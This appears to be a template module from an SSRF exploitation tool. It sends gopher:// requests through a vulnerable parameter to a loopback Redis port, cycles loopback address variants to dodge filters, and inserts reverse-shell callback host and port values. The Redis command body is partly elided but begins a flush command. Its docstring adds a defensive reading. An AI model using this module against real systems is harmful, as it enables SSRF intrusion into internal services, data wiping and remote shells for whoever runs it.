from core.utils import *
import logging
# Module metadata. Every value below is a template placeholder that a concrete
# module replaces with its own text.

# Short identifier of the targeted service; exploit.__init__ prints it in its
# start-up log line.
name = "servicename in lowercase"

# One-line summary of what the module does against the service.
description = "ServiceName RCE - What does it do"

# Who wrote the module.
author = "Name or pseudo of the author"

# References (research write-ups, advisories) that explain the technique.
documentation = [
    "http://link_to_a_research",
    "http://another_link",
]
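class exploit():
    """Template module: wrap a fixed request body for a loopback service and submit it.

    For every host string yielded by ``gen_ip_list("127.0.0.1", args.level)``
    the constructor builds a payload with ``wrapper_gopher`` aimed at port
    6379 (the default Redis port), substitutes the callback host and port,
    and hands the result to ``requester.do_request``.

    Defensive reading: the request this produces carries, in the parameter
    named by ``args.param``, a URL that targets a loopback address.
    ``wrapper_gopher`` lives in ``core.utils`` and is not shown here;
    presumably it emits a ``gopher://`` URL. A server-side fetcher that
    accepts only http/https and refuses loopback or internal destinations
    would not forward such a value.
    """

    # Placeholder defaults; __init__ always overwrites both on the instance.
    SERVER_HOST = "127.0.0.1"
    SERVER_PORT = "4242"

    def __init__(self, requester, args):
        """Resolve the callback address, then build and send one payload per host.

        Args:
            requester: object exposing ``do_request(param, payload)``.
            args: parsed options; this method reads ``lhost``, ``lport``,
                ``level`` and ``param``.
        """
        logging.info(f"Module '{name}' launched !")

        # Handle args for reverse shell: prompt only when the option is absent.
        # Identity comparison is the correct test for None.
        if args.lhost is None:
            self.SERVER_HOST = input("Server Host:")
        else:
            self.SERVER_HOST = args.lhost

        # NOTE(review): str.replace below needs a str, so args.lport must
        # already be a string; confirm against the argument parser.
        if args.lport is None:
            self.SERVER_PORT = input("Server Port:")
        else:
            self.SERVER_PORT = args.lport

        # Using a generator to create the host list.
        # NOTE(review): presumably yields alternative spellings of the
        # loopback address selected by args.level; confirm in core.utils.
        gen_host = gen_ip_list("127.0.0.1", args.level)
        for ip in gen_host:

            # Data and port for the service. The body is URL-encoded and
            # shown elided ("[...]") in this template.
            port = "6379"
            data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
            payload = wrapper_gopher(data, ip , port)

            # Handle args for reverse shell: replace the literal
            # SERVER_HOST / SERVER_PORT tokens wherever the payload has them.
            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)

            # Send the payload; the response is kept in r but not inspected.
            r = requester.do_request(args.param, payload)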